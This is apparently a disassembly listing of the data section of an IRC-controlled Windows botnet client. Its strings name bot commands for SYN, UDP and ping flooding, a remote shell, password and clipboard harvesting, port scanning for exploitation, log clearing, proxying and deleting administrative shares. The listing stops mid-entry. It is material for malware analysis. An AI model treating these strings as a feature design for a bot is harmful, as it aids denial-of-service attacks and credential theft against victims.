aCom_prockillid db 'com.prockillid',0 ; DATA XREF: sub_40D2E0+1BA0�o
align 4
aCom_kpn db 'com.kpn',0 ; DATA XREF: sub_40D2E0+1B89�o
aCom_killprocna db 'com.killprocname',0 ; DATA XREF: sub_40D2E0+1B72�o
align 4
aIrc_dn db 'irc.dn',0 ; DATA XREF: sub_40D2E0+1B5B�o
align 4
aIrc_dns db 'irc.dns',0 ; DATA XREF: sub_40D2E0+1B44�o
aIrc_se db 'irc.se',0 ; DATA XREF: sub_40D2E0+1B2D�o
align 4
aIrc_setserve db 'irc.setserve',0 ; DATA XREF: sub_40D2E0+1B16�o
align 4
aCom_o db 'com.o',0 ; DATA XREF: sub_40D2E0+1AFF�o
align 4
aCom_open db 'com.open',0 ; DATA XREF: sub_40D2E0+1AE8�o
align 10h
aIrc_pr db 'irc.pr',0 ; DATA XREF: sub_40D2E0+1AD1�o
align 4
aIrc_prefix db 'irc.prefix',0 ; DATA XREF: sub_40D2E0+1ABA�o
align 4
aClone_rn db 'clone.rn',0 ; DATA XREF: sub_40D2E0+1AA3�o
align 10h
aClone_rndnick db 'clone.rndnick',0 ; DATA XREF: sub_40D2E0+1A8C�o
align 10h
aClone_q db 'clone.q',0 ; DATA XREF: sub_40D2E0+1A75�o
aClone_quit db 'clone.quit',0 ; DATA XREF: sub_40D2E0+1A5E�o
align 4
aThreads_k db 'threads.k',0 ; DATA XREF: sub_40D2E0+1A47�o
align 10h
aThreads_kill db 'threads.kill',0 ; DATA XREF: sub_40D2E0+1A30�o
align 10h
aIrc_ra db 'irc.ra',0 ; DATA XREF: sub_40D2E0+1A19�o
align 4
aIrc_raw db 'irc.raw',0 ; DATA XREF: sub_40D2E0+1A02�o
aIrc_pt db 'irc.pt',0 ; DATA XREF: sub_40D2E0+19EB�o
align 4
aIrc_part db 'irc.part',0 ; DATA XREF: sub_40D2E0+19D4�o
align 4
aIrc_j db 'irc.j',0 ; DATA XREF: sub_40D2E0+19BD�o
align 4
aIrc_join db 'irc.join',0 ; DATA XREF: sub_40D2E0+19A6�o
align 4
aIrc_n db 'irc.n',0 ; DATA XREF: sub_40D2E0+198F�o
align 10h
aIrc_nick db 'irc.nick',0 ; DATA XREF: sub_40D2E0+1978�o
align 4
aSa db 'sa',0 ; DATA XREF: sub_40D2E0+1952�o
align 10h
aScanall db 'scanall',0 ; DATA XREF: sub_40D2E0+193D�o
aCom_fp db 'com.fp',0 ; DATA XREF: sub_40D2E0+1928�o
align 10h
aCom_findpass db 'com.findpass',0 ; DATA XREF: sub_40D2E0+1913�o
align 10h
aDaemon_tf_on db 'daemon.tf.on',0 ; DATA XREF: sub_40D2E0+18FE�o
align 10h
aDaemon_tftp_on db 'daemon.tftp.on',0 ; DATA XREF: sub_40D2E0+18E9�o
align 10h
aDaemon_web_on db 'daemon.web.on',0 ; DATA XREF: sub_40D2E0+18D4�o
align 10h
aDaemon_httpd_o db 'daemon.httpd.on',0 ; DATA XREF: sub_40D2E0+18BF�o
aDaemon_rl_on db 'daemon.rl.on',0 ; DATA XREF: sub_40D2E0+18AA�o
align 10h
aDaemon_rlogi_0 db 'daemon.rlogin.on',0 ; DATA XREF: sub_40D2E0+1895�o
align 4
aRoot_cip db 'root.cip',0 ; DATA XREF: sub_40D2E0+1880�o
align 10h
aRoot_currentip db 'root.currentip',0 ; DATA XREF: sub_40D2E0+186B�o
align 10h
aUtil_fdns db 'util.fdns',0 ; DATA XREF: sub_40D2E0+1856�o
align 4
aUtil_flushdns db 'util.flushdns',0 ; DATA XREF: sub_40D2E0+1841�o
align 4
aUtil_farp db 'util.farp',0 ; DATA XREF: sub_40D2E0+182C�o
align 4
aUtil_flusharp db 'util.flusharp',0 ; DATA XREF: sub_40D2E0+1817�o
align 4
aCom_gc db 'com.gc',0 ; DATA XREF: sub_40D2E0+1802�o
align 10h
aCom_getclip db 'com.getclip',0 ; DATA XREF: sub_40D2E0+17ED�o
dword_42DC0C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+17DD�o
dd 2BBBB02h
aLoginListCompl db ' Login list complete.',0
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_40D2E0+17A9�o
; sub_414FE9+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_40D2E0+179C�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_40D2E0+177A�o
align 4
aIrc_who db 'irc.who',0 ; DATA XREF: sub_40D2E0+1761�o
aCmd db '[CMD]',0 ; DATA XREF: sub_40D2E0+1756�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_40D2E0+1751�o
align 4
aCom_ocmd_off db 'com.ocmd.off',0 ; DATA XREF: sub_40D2E0+1738�o
align 4
aCom_ocmd db 'com.ocmd',0 ; DATA XREF: sub_40D2E0+1723�o
align 4
aCom_opencmd db 'com.opencmd',0 ; DATA XREF: sub_40D2E0+170E�o
aCom_dll db 'com.dll',0 ; DATA XREF: sub_40D2E0+16F9�o
aCom_testdlls db 'com.testdlls',0 ; DATA XREF: sub_40D2E0+16E4�o
align 4
aCom_drv db 'com.drv',0 ; DATA XREF: sub_40D2E0+16CF�o
aCom_driveinfo db 'com.driveinfo',0 ; DATA XREF: sub_40D2E0+16BA�o
align 4
aCom_up db 'com.up',0 ; DATA XREF: sub_40D2E0+16A5�o
align 4
aCom_uptime db 'com.uptime',0 ; DATA XREF: sub_40D2E0+1690�o
align 4
aCom_key db 'com.key',0 ; DATA XREF: sub_40D2E0+167B�o
aCom_harvest db 'com.harvest',0 ; DATA XREF: sub_40D2E0+1666�o
aCom_ps db 'com.ps',0 ; DATA XREF: sub_40D2E0+1651�o
align 4
aCom_procs db 'com.procs',0 ; DATA XREF: sub_40D2E0+163C�o
align 10h
aIrc_rm0 db 'irc.rm0',0 ; DATA XREF: sub_40D2E0+1627�o
aIrc_rem0ve db 'irc.rem0ve',0 ; DATA XREF: sub_40D2E0+1612�o
align 4
aCom_si db 'com.si',0 ; DATA XREF: sub_40D2E0+15FD�o
align 4
aCom_sysinfo db 'com.sysinfo',0 ; DATA XREF: sub_40D2E0+15E8�o
unk_42DD38 db 2 ; DATA XREF: sub_40D2E0+15DD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 75h, 70h
db 65h ; e
db 72h, 73h, 79h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_28 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_42DD84 db 2 ; DATA XREF: sub_40D2E0+156E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 75h, 70h
db 65h ; e
db 72h, 73h, 79h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSFo_1 db ' Flooding: (%s:%s) for %s seconds.',0
aDdos_supersyn db 'ddos.supersyn',0 ; DATA XREF: sub_40D2E0+14D8�o
align 4
aCom_ni db 'com.ni',0 ; DATA XREF: sub_40D2E0+14C3�o
align 4
aCom_netinfo db 'com.netinfo',0 ; DATA XREF: sub_40D2E0+14AE�o
aUtil_clg db 'util.clg',0 ; DATA XREF: sub_40D2E0+1499�o
align 4
aUtil_clearlog db 'util.clearlog',0 ; DATA XREF: sub_40D2E0+1484�o
align 4
aIrc_lg db 'irc.lg',0 ; DATA XREF: sub_40D2E0+146F�o
align 4
aIrc_log db 'irc.log',0 ; DATA XREF: sub_40D2E0+145A�o
aIrc_al db 'irc.al',0 ; DATA XREF: sub_40D2E0+1445�o
align 4
aIrc_aliases db 'irc.aliases',0 ; DATA XREF: sub_40D2E0+1430�o
aThreads_l db 'threads.l',0 ; DATA XREF: sub_40D2E0+141B�o
align 4
aThreads_list db 'threads.list',0 ; DATA XREF: sub_40D2E0+1406�o
align 4
dword_42DE44 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+13D2�o
dd 2BBBB02h
aFailedToReboot db ' Failed to reboot system.',0
align 4
dword_42DE78 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+13CB�o
dd 2BBBB02h
aRebootingSyste db ' Rebooting system.',0
aCom_rebewt db 'com.rebewt',0 ; DATA XREF: sub_40D2E0+13B4�o
align 10h
aIrc_i db 'irc.i',0 ; DATA XREF: sub_40D2E0+139F�o
align 4
aIrc_id db 'irc.id',0 ; DATA XREF: sub_40D2E0+138A�o
align 10h
aIrc_s db 'irc.s',0 ; DATA XREF: sub_40D2E0+1375�o
align 4
aIrc_status db 'irc.status',0 ; DATA XREF: sub_40D2E0+1360�o
align 4
aIrc_q db 'irc.q',0 ; DATA XREF: sub_40D2E0+134B�o
align 4
aIrc_quit db 'irc.quit',0 ; DATA XREF: sub_40D2E0+1336�o
align 4
aIrc_d db 'irc.d',0 ; DATA XREF: sub_40D2E0+1321�o
align 10h
aIrc_disconnect db 'irc.disconnect',0 ; DATA XREF: sub_40D2E0+130C�o
align 10h
aIrc_r db 'irc.r',0 ; DATA XREF: sub_40D2E0+12F7�o
align 4
aIrc_reconnect db 'irc.reconnect',0 ; DATA XREF: sub_40D2E0+12E2�o
align 4
aRoot_st db 'root.st',0 ; DATA XREF: sub_40D2E0+12CD�o
aRoot_stats db 'root.stats',0 ; DATA XREF: sub_40D2E0+12B8�o
align 4
aExploitation db 'Exploitation',0 ; DATA XREF: sub_40D2E0+12AD�o
align 4
aScan db 'Scan',0 ; DATA XREF: sub_40D2E0+12A8�o
align 4
aRoot_stop db 'root.stop',0 ; DATA XREF: sub_40D2E0+128F�o
align 10h
dword_42DF50 dd 65027302h, 1F727563h, 2E2E1F65h, 0 ; DATA XREF: sub_40D2E0+1284�o
aSecure_0 db 'Secure',0 ; DATA XREF: sub_40D2E0+127F�o
align 4
aLockdown_stop db 'lockdown.stop',0 ; DATA XREF: sub_40D2E0+1266�o
align 4
dword_42DF78 dd 6C026302h, 1F656E6Fh, 2E2E1F73h, 0 ; DATA XREF: sub_40D2E0+125B�o
aClone db 'Clone',0 ; DATA XREF: sub_40D2E0+1256�o
align 10h
aClone_off db 'clone.off',0 ; DATA XREF: sub_40D2E0+123D�o
align 4
aCom_ps_off db 'com.ps.off',0 ; DATA XREF: sub_40D2E0+1228�o
align 4
aCom_procs_off db 'com.procs.off',0 ; DATA XREF: sub_40D2E0+1213�o
align 4
aUtil_ff_off db 'util.ff.off',0 ; DATA XREF: sub_40D2E0+11FE�o
aUtil_findfile_ db 'util.findfile.off',0 ; DATA XREF: sub_40D2E0+11E9�o
align 4
dword_42DFD8 dd 66027402h, 641F7074h, 2E2E1Fh ; DATA XREF: sub_40D2E0+11DE�o
aDaemon_tftp_of db 'daemon.tftp.off',0 ; DATA XREF: sub_40D2E0+11C0�o
dword_42DFF4 dd 69027002h, 1F671F6Eh, 2E2Eh ; DATA XREF: sub_40D2E0+11B5�o
dword_42E000 dd 676E6950h, 6F6C6620h, 646Fh ; DATA XREF: sub_40D2E0+11B0�o
dword_42E00C dd 736F6464h, 6E69702Eh, 666F2E67h, 66h ; DATA XREF: sub_40D2E0+1197�o
dword_42E01C dd 64027502h, 2E1F701Fh, 2Eh ; DATA XREF: sub_40D2E0+118C�o
dword_42E028 dd 20504455h, 6F6F6C66h, 64h ; DATA XREF: sub_40D2E0+1187�o
dword_42E034 dd 736F6464h, 7064752Eh, 66666F2Eh, 0 ; DATA XREF: sub_40D2E0+116E�o
dword_42E044 dd 79027302h, 2E1F6E1Fh, 2Eh ; DATA XREF: sub_40D2E0+1163�o
dword_42E050 dd 206E7953h, 6F6F6C66h, 64h ; DATA XREF: sub_40D2E0+115E�o
dword_42E05C dd 736F6464h, 6E79732Eh, 66666F2Eh, 0 ; DATA XREF: sub_40D2E0+1145�o
dword_42E06C dd 64026402h, 1F731F6Fh, 2E2Eh ; DATA XREF: sub_40D2E0+113A�o
dword_42E078 dd 536F4444h, 6F6C6620h, 646Fh ; DATA XREF: sub_40D2E0+1135�o
dword_42E084 dd 736F6464h, 66666F2Eh, 0 ; DATA XREF: sub_40D2E0+111C�o
dword_42E090 dd 65027202h, 65726964h, 1F741F63h, 2E2Eh ; DATA XREF: sub_40D2E0+1111�o
dword_42E0A0 dd 20504354h, 69646572h, 74636572h, 0 ; DATA XREF: sub_40D2E0+110C�o
aProxy_redirect db 'proxy.redirect.off',0 ; DATA XREF: sub_40D2E0+10F3�o
align 4
dword_42E0C4 dd 6F026C02h, 2E1F671Fh, 2Eh ; DATA XREF: sub_40D2E0+10E8�o
dword_42E0D0 dd 20676F4Ch, 7473696Ch, 0 ; DATA XREF: sub_40D2E0+10E3�o
dword_42E0DC dd 2E676F6Ch, 66666Fh ; DATA XREF: sub_40D2E0+10CA�o
dword_42E0E4 dd 74026802h, 641F7074h, 2E2E1Fh ; DATA XREF: sub_40D2E0+10C2�o
dword_42E0F0 dd 6D656164h, 772E6E6Fh, 6F2E6265h, 6666h ; DATA XREF: sub_40D2E0+10A4�o
dword_42E100 dd 6C027202h, 6E69676Fh, 2E1F641Fh, 2Eh ; DATA XREF: sub_40D2E0+109C�o
aDaemon_rlogin_ db 'daemon.rlogin.off',0 ; DATA XREF: sub_40D2E0+107E�o
align 4
dword_42E124 dd 6F027302h, 1F736B63h, 2E2E1F34h, 0 ; DATA XREF: sub_40D2E0+105C�o
aServer db 'Server',0 ; DATA XREF: sub_40D2E0+1057�o
; sub_40D2E0+1097�o ...
align 4
aProxy_socks4_0 db 'proxy.socks4.off',0 ; DATA XREF: sub_40D2E0+103E�o
align 10h
aProxy_s4_on db 'proxy.s4.on',0 ; DATA XREF: sub_40D2E0+1029�o
aProxy_socks4_o db 'proxy.socks4.on',0 ; DATA XREF: sub_40D2E0+1014�o
aLd_off db 'ld.off',0 ; DATA XREF: sub_40D2E0+FFF�o
align 4
aLockdown_off db 'lockdown.off',0 ; DATA XREF: sub_40D2E0+FEA�o
align 4
aLd_on db 'ld.on',0 ; DATA XREF: sub_40D2E0+FD5�o
align 4
aLockdown_on db 'lockdown.on',0 ; DATA XREF: sub_40D2E0+FC0�o
aVer db 'ver',0 ; DATA XREF: sub_40D2E0+FAB�o
aIrc_version db 'irc.version',0 ; DATA XREF: sub_40D2E0+F96�o
aLo db 'lo',0 ; DATA XREF: sub_40D2E0+F81�o
align 4
aIrc_logout db 'irc.logout',0 ; DATA XREF: sub_40D2E0+F6C�o
align 4
aIrc_di db 'irc.di',0 ; DATA XREF: sub_40D2E0+F57�o
align 10h
aIrc_die db 'irc.die',0 ; DATA XREF: sub_40D2E0+F42�o
aRn db 'rn',0 ; DATA XREF: sub_40D2E0+F2D�o
align 4
aIrc_rndnick db 'irc.rndnick',0 ; DATA XREF: sub_40D2E0+F15�o
a63 db '63',0 ; DATA XREF: sub_40D2E0+DEE�o
align 4
asc_42E1DC: ; DATA XREF: sub_40D2E0+DC6�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_40D2E0+D89�o
align 4
aServer_0 db '$server',0 ; DATA XREF: sub_40D2E0+D7E�o
aRndnick db '$rndnick',0 ; DATA XREF: sub_40D2E0+D6D�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_40D2E0+D51�o
align 4
aUser_2 db '$user',0 ; DATA XREF: sub_40D2E0+D40�o
align 4
aMe_0 db '$me',0 ; DATA XREF: sub_40D2E0+D2E�o
aD db '$%d',0 ; DATA XREF: sub_40D2E0+CC0�o
aD_0 db '$%d-',0 ; DATA XREF: sub_40D2E0+C05�o
align 4
aC_0: ; DATA XREF: sub_40D2E0+B19�o
unicode 0, <c>,0
dword_42E220 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+AE4�o
dd 2BBBB02h
aChatFailedByUn db ' Chat failed by unauthorized user: %s.',0
dword_42E260 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+AD6�o
dd 2BBBB02h
aChatAlreadyAct db ' Chat already active with user: %s.',0
align 10h
dword_42E2A0 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+AC8�o
dd 2BBBB02h
aFailedToSta_29 db ' Failed to start chat thread, error: <%d>.',0
dword_42E2E4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+A59�o
dd 2BBBB02h
aChatFromUserS_ db ' Chat from user: %s.',0
align 4
aChat db 'CHAT',0 ; DATA XREF: sub_40D2E0+9BF�o
align 4
dword_42E31C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+99C�o
dd 2BBBB02h
aReceiveFileSFa db ' Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
dword_42E36C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+984�o
; sub_40D2E0+4ABC�o
dd 2BBBB02h
aFailedToSta_30 db ' Failed to start transfer thread, error: <%d>.',0
dword_42E3B4 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40D2E0+973�o
dd 0A0Dh
dword_42E3CC dd 4E495001h, 47h ; DATA XREF: sub_40D2E0+93F�o
aSHasJustVersio db '%s has just versioned me.',0 ; DATA XREF: sub_40D2E0+8F9�o
align 10h
dword_42E3F0 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40D2E0+8DC�o
dd 0D017325h, 0Ah
dword_42E40C dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_40D2E0+8AB�o
dword_42E418 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+791�o
dd 2BBBB02h
aReceiveFileSFr db ' Receive file: ',27h,'%s',27h,' from user: %s.',0
aSend_0 db 'SEND',0 ; DATA XREF: sub_40D2E0+6E8�o
align 4
dword_42E45C dd 43434401h, 0 ; DATA XREF: sub_40D2E0+6CA�o
dword_42E464 dd 323333h ; DATA XREF: sub_40D2E0+651�o
; sub_40D2E0+B4F�o ...
dword_42E468 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5D2�o
dd 2BBBB02h
aUserSLoggedOut db ' User: %s logged out.',0
align 4
dword_42E498 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5AB�o
dd 2BBBB02h
aJoinedChanne_0 db ' Joined channel: %s.',0
align 4
a353 db '353',0 ; DATA XREF: sub_40D2E0+574�o
aPart db 'PART',0 ; DATA XREF: sub_40D2E0+526�o
; sub_40D2E0+5EF�o
align 4
aSS_1 db ':%s%s',0 ; DATA XREF: sub_40D2E0+4FE�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_40D2E0+3D0�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+371�o
; sub_40D2E0+613�o
dword_42E4F4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+355�o
; sub_40D2E0+5FF4�o ...
dd 2BBBB02h
aUserSLoggedO_0 db ' User %s logged out.',0
align 4
aKick db 'KICK',0 ; DATA XREF: sub_40D2E0+2E4�o
align 4
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+28D�o
; sub_40D2E0+4EB7�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_40D2E0+262�o
a@: ; DATA XREF: sub_40D2E0+23A�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40D2E0+22A�o
a005 db '005',0 ; DATA XREF: sub_40D2E0+215�o
a001 db '001',0 ; DATA XREF: sub_40D2E0+200�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+1E4�o
; sub_40D2E0+3B7�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+1C3�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_40D2E0+1A9�o
align 10h
asc_42E570: ; DATA XREF: sub_40D2E0+19A�o
; sub_40D2E0+60FB�o
unicode 0, <!>,0
asc_42E574 db ' :',0 ; DATA XREF: sub_40D2E0+86�o
; sub_40D2E0:loc_40DE87�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_4135F8+120�o
align 4
unk_42E584 db 2 ; DATA XREF: sub_4137A9:loc_413830�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessListFai db 'Process list failed.',0
align 4
unk_42E5BC db 2 ; DATA XREF: sub_4137A9+80�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessListCom db 'Process list completed.',0
unk_42E5F4 db 2 ; DATA XREF: sub_4137A9+19�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aListingProcess db 'Listing processes:',0
align 4
dword_42E628 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4138EE+1E9�o
dd 2029671Fh, 2BBBB02h
aUserLoggedOutS db ' User logged out: <%s@%s>.',0
dword_42E660 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4138EE+1C2�o
dd 2029671Fh, 2BBBB02h
aErrorSessionru db ' Error: SessionRun(): <%d>.',0
align 4
dword_42E69C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4138EE+1A2�o
dd 2029671Fh, 2BBBB02h
aUserLoggedInS@ db ' User logged in: <%s@%s>.',0
align 4
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_4138EE+172�o
align 4
dword_42E6E8 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4138EE+E1�o
dd 2029671Fh, 2BBBB02h
aErrorGetpeerna db ' Error: getpeername(): <%d>.',0
align 4
dword_42E724 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_413AF3:loc_413B38�o
dd 2029671Fh, 2BBBB02h
aProtocolString db ' Protocol string too long.',0
dword_42E75C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_413B4D+1B�o
dd 2029671Fh, 2BBBB02h
aLoginRejectedR db ' Login rejected, Remote user: <%s@%s>.',0
dword_42E7A0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_413B7C+219�o
dd 2029671Fh, 2BBBB02h
aErrorServerF_0 db ' Error: server failed, returned: <%d>.',0
dword_42E7E4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_413B7C+1FB�o
dd 2029671Fh, 2BBBB02h
aFailedToSta_31 db ' Failed to start client thread, error: <%d>.',0
align 10h
dword_42E830 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_413B7C+177�o
dd 2029671Fh, 2BBBB02h
aClientConnec_2 db ' Client connection from IP: %s:%d, Server thread: %d.',0
align 4
dword_42E884 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_413B7C+106�o
dd 2029671Fh, 2BBBB02h
aReadyAndWaitin db ' Ready and waiting for incoming connections.',0
align 10h
dword_42E8D0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_413B7C+70�o
dd 2029671Fh, 2BBBB02h
aFailedToInstal db ' Failed to install control-C handler, error: <%d>.',0
dword_42E920 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_413B7C+3D�o
dd 2029671Fh, 2BBBB02h, 72452020h, 3A726F72h, 41535720h
dd 72617453h, 28707574h, 3C203A29h, 2E3E6425h, 2 dup(0)
aConst db 'const',0
align 4
dd 0
dword_42E96C dd 1 ; DATA XREF: sub_41416F+7�o
off_42E970 dd offset sub_413E04 ; DATA XREF: sub_41416F+49�r
aLetter db 'letter',0
align 10h
dd 2, 413E62h, 706D6F63h, 2 dup(0)
dd 3, 413EAFh, 6E756F63h, 797274h, 0
dd 4, 413F4Dh, 736Fh, 2 dup(0)
dd 5, 413FC2h
dword_42E9C4 dd 69257325h, 0 ; DATA XREF: sub_413E04+40�o
; _0:00413F2E�o ...
byte_42E9CC db 50h ; DATA XREF: _0:00413ED1�o _0:00413EDE�r
db 43h, 2 dup(0)
dword_42E9D0 dd 7C7325h ; DATA XREF: _0:00413F7C�o
; sub_41416F+39�o
dword_42E9D4 dd 5D73255Bh, 7Ch ; DATA XREF: _0:00414086�o
dword_42E9DC dd 334B32h ; DATA XREF: _0:00414076�o
dword_42E9E0 dd 5D64255Bh, 7325h ; DATA XREF: sub_4140CC+3A�o
dword_42E9E8 dd 5D4D5Bh ; DATA XREF: sub_4140CC+2C�o
; sub_4140CC+57�o
unk_42E9EC db 2 ; DATA XREF: sub_4141D8+92�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOp_0 db ' IP: %s Port: %d is open.',0
unk_42EA24 db 2 ; DATA XREF: sub_4142A5+41�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanningIpSPor db ' Scanning IP: %s, Port: %d.',0
align 10h
off_42EA60 dd offset dword_42EA98 ; DATA XREF: sub_4143F6+1B3�o
; sub_41471A+17A�o
dd 0
dd offset dword_42EA90
align 10h
off_42EA70 dd offset dword_42EA8C ; DATA XREF: sub_41471A+1E3�o
dd offset dword_42EA88
dd offset dword_42EA84
dd offset dword_42EA80
dword_42EA80 dd 5C3A44h ; DATA XREF: sub_4143F6+217�o
; _2:0042EA7C�o
dword_42EA84 dd 2444h ; DATA XREF: _2:0042EA78�o
dword_42EA88 dd 5C3A43h ; DATA XREF: _2:0042EA74�o
dword_42EA8C dd 2443h ; DATA XREF: _2:off_42EA70�o
dword_42EA90 dd 494D4441h, 244Eh ; DATA XREF: _2:0042EA68�o
dword_42EA98 dd 24435049h, 0 ; DATA XREF: _2:off_42EA60�o
unk_42EAA0 db 2 ; DATA XREF: sub_4143F6+2E5�o
; sub_41471A+2DB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aNetapi32_dllCo db ' Netapi32.dll couldn',27h,'t be loaded.',0
align 10h
unk_42EAE0 db 2 ; DATA XREF: sub_4143F6+2CF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aNetworkSharesD db ' Network shares deleted.',0
align 4
unk_42EB18 db 2 ; DATA XREF: sub_4143F6:loc_414658�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToDelete db ' Failed to delete ',27h,'%S',27h,' share.',0
align 4
unk_42EB54 db 2 ; DATA XREF: sub_4143F6+25B�o
db 6Eh, 2, 7Ah
db 1Fh
